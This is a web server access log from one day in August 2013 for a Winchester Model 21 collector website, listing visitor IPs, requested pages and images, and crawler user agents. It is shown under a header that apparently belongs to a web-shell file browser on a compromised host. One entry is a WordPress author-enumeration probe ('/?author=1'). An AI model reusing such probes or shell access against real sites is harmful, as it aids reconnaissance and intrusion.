0byt3m1n1
Path:
/
data
/
0
/
0
/
73
/
140
/
73792
/
meta
/
75058
/
logs
/
[
Home
]
File: x-access_log.2013-08-12
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_W34005P2Pigeon28.jpg HTTP/1.1" 200 7086 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
157.55.32.103 - - [12/Aug/2013:13:40:53 -0400] "GET /email.html HTTP/1.1" 200 13700 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_W34006P1Custom.jpg HTTP/1.1" 200 12110 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
5.10.83.48 - - [12/Aug/2013:11:01:46 -0400] "GET /page1.html HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
5.10.83.48 - - [12/Aug/2013:06:48:26 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET / HTTP/1.1" 200 16143 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:24:59 -0400] "GET /images/0.jpg HTTP/1.1" 200 302 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:24:59 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
66.249.75.64 - - [12/Aug/2013:01:05:07 -0400] "GET /gauges.html HTTP/1.1" 200 31730 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
101.226.168.211 - - [12/Aug/2013:11:31:21 -0400] "GET /robots.txt HTTP/1.1" 200 25 "http://www.winchestermodel21.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; Tablet PC 2.0); 360Spider"
220.181.89.190 - - [12/Aug/2013:06:37:37 -0400] "GET / HTTP/1.1" 200 16143 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
95.108.248.30 - - [12/Aug/2013:06:52:07 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
123.125.71.45 - - [12/Aug/2013:20:43:08 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (Linux;u;Android 2.3.7;zh-cn;) AppleWebKit/533.1 (KHTML,like Gecko) Version/4.0 Mobile Safari/533.1 (compatible; +http://www.baidu.com/search/spider.html)"
157.55.32.103 - - [12/Aug/2013:13:39:24 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.109 - - [12/Aug/2013:05:51:30 -0400] "GET /grades/gauges.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
220.181.108.77 - - [12/Aug/2013:20:43:16 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://www.winchestermodel21.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko Minefield/3.0"
68.108.150.100 - - [12/Aug/2013:21:26:20 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)"
63.87.61.76 - - [12/Aug/2013:22:08:59 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
72.23.74.73 - - [12/Aug/2013:00:16:27 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
123.151.148.174 - - [12/Aug/2013:02:47:02 -0400] "GET / HTTP/1.1" 200 16143 "http://www.winchestermodel21.com/" "Mozilla/5.0 (compatible; Sosospider/2.0; +http://help.soso.com/webspider.htm)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
180.76.5.24 - - [12/Aug/2013:10:42:53 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
166.147.88.18 - - [12/Aug/2013:19:39:10 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "-" "Dalvik/1.6.0 (Linux; U; Android 4.1.2; SAMSUNG-SGH-I317 Build/JZO54K)"
180.76.5.16 - - [12/Aug/2013:14:44:39 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
68.113.106.222 - - [12/Aug/2013:00:29:24 -0400] "GET /images/325_John_Olin_KingBuck_cover_Winchester_cat_1970_H6.jpg HTTP/1.1" 200 35909 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
199.21.99.103 - - [12/Aug/2013:09:14:21 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
157.55.35.109 - - [12/Aug/2013:05:50:01 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.52.114 - - [12/Aug/2013:02:01:31 -0400] "GET /page1.html HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.115 - - [12/Aug/2013:18:36:21 -0400] "GET /highlights.html HTTP/1.1" 200 13043 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
87.244.141.29 - - [12/Aug/2013:20:33:08 -0400] "HEAD /?author=1 HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.108.150.100 - - [12/Aug/2013:19:19:08 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://winchestermodel21.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
192.96.204.42 - - [12/Aug/2013:22:26:07 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)"
72.23.74.73 - - [12/Aug/2013:00:16:27 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
63.87.61.76 - - [12/Aug/2013:22:09:10 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
72.23.74.73 - - [12/Aug/2013:00:16:27 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:07:01 -0400] "GET /images/0.jpg HTTP/1.1" 200 302 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
123.151.148.174 - - [12/Aug/2013:17:27:32 -0400] "GET / HTTP/1.1" 200 16143 "http://www.winchestermodel21.com/" "Mozilla/5.0 (compatible; Sosospider/2.0; +http://help.soso.com/webspider.htm)"
66.249.75.117 - - [12/Aug/2013:12:43:25 -0400] "GET /page6.html HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.108.150.100 - - [12/Aug/2013:19:19:17 -0400] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
38.100.21.66 - - [12/Aug/2013:19:43:37 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:38 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:39 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:40 -0400] "GET /acquire.html HTTP/1.1" 200 14146 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:40 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:40 -0400] "GET /grades.html HTTP/1.1" 200 29320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:42 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:43 -0400] "GET /aboutthecollection.html HTTP/1.1" 200 16143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:43 -0400] "GET /special.html HTTP/1.1" 200 39329 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:44 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [12/Aug/2013:19:43:44 -0400] "GET /gauges.html HTTP/1.1" 200 31730 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
220.181.108.90 - - [12/Aug/2013:20:43:17 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://www.winchestermodel21.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko Minefield/3.0"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_Pigeon410P2.jpg HTTP/1.1" 200 7578 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:24:59 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
63.87.61.76 - - [12/Aug/2013:22:12:12 -0400] "GET /gauges.html HTTP/1.1" 200 31730 "http://www.winchestermodel21.com/email.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
63.87.61.76 - - [12/Aug/2013:22:12:14 -0400] "GET /images/171_Pigeon20FourBblSet.jpg HTTP/1.1" 200 7213 "http://www.winchestermodel21.com/gauges.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
71.176.202.198 - - [12/Aug/2013:17:24:58 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET /scripts/6custom.css HTTP/1.1" 200 2825 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET /scripts/icwebsiteelement.css HTTP/1.1" 200 8132 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
166.137.119.49 - - [12/Aug/2013:11:46:03 -0400] "GET /images/0.jpg HTTP/1.1" 200 302 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
166.147.88.18 - - [12/Aug/2013:19:41:31 -0400] "GET /images/171_M21W34008P1Grade2.jpg HTTP/1.1" 200 10780 "-" "Dalvik/1.6.0 (Linux; U; Android 4.1.2; SAMSUNG-SGH-I317 Build/JZO54K)"
199.21.99.103 - - [12/Aug/2013:22:35:47 -0400] "GET / HTTP/1.1" 200 16143 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.211.200.121 - - [12/Aug/2013:04:12:05 -0400] "GET /aboutthecollection.html HTTP/1.0" 200 16143 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 support@google.com"
123.125.71.45 - - [12/Aug/2013:09:29:06 -0400] "GET /scripts/photoalbum.js HTTP/1.1" 200 62481 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/user.js HTTP/1.1" 200 23762 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /images/0.jpg HTTP/1.1" 200 302 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
155.91.28.231 - - [12/Aug/2013:10:28:04 -0400] "GET /favicon.ico HTTP/1.1" 404 575 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
166.137.119.49 - - [12/Aug/2013:11:46:02 -0400] "GET /scripts/website.css HTTP/1.1" 200 1917 "http://www.winchestermodel21.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25"
65.55.52.114 - - [12/Aug/2013:01:58:15 -0400] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /scripts/5custom.css HTTP/1.1" 200 5531 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_M21W34009Grade3P1.jpg HTTP/1.1" 200 12040 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
71.176.202.198 - - [12/Aug/2013:17:25:13 -0400] "GET /images/171_W34000P2GA410.jpg HTTP/1.1" 200 8066 "http://www.winchestermodel21.com/grades.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
63.87.61.76 - - [12/Aug/2013:22:12:03 -0400] "GET /scripts/14custom.css HTTP/1.1" 200 5521 "http://www.winchestermodel21.com/email.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
54.224.147.189 - - [12/Aug/2013:07:03:48 -0400] "HEAD / HTTP/1.1" 200 - "-" "python-requests/1.1.0 CPython/2.7.4 Linux/3.8.0-19-generic"
63.87.61.76 - - [12/Aug/2013:22:09:35 -0400] "GET /images/0.jpg HTTP/1.1" 200 302 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
220.181.108.93 - - [12/Aug/2013:07:41:49 -0400] "GET /scripts/print.css HTTP/1.1" 200 11304 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
166.137.89.144 - - [12/Aug/2013:13:36:01 -0400] "GET /images/446_DSC_1422_1524COVER052306.jpg HTTP/1.1" 200 26539 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B143 Safari/8536.25"
99.74.206.205 - - [12/Aug/2013:20:06:59 -0400] "GET /scripts/template.css HTTP/1.1" 200 10951 "http://www.winchestermodel21.com/" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
63.87.61.76 - - [12/Aug/2013:22:09:34 -0400] "GET /scripts/ic_globals_published.js HTTP/1.1" 200 566 "http://www.winchestermodel21.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
